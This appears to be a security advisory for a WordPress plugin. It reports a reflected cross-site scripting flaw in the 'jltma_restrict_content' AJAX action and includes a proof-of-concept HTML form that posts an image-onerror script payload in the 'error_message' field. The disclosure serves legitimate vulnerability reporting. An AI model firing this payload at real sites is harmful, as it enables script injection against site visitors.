The plugin does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, available to unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting
<html>
<form action="https://example.com/wp-admin/admin-ajax.php?action=jltma_restrict_content" method="POST">
<input type="text" value="ma_el_rc_answer=x" name="fields">
<input type="text" value="math_captcha" name="restrict_type">
<input type="text" value="<img src onerror=alert(`XSS`)>" name="error_message">
<input type="submit" value="Send">
</form>
</html>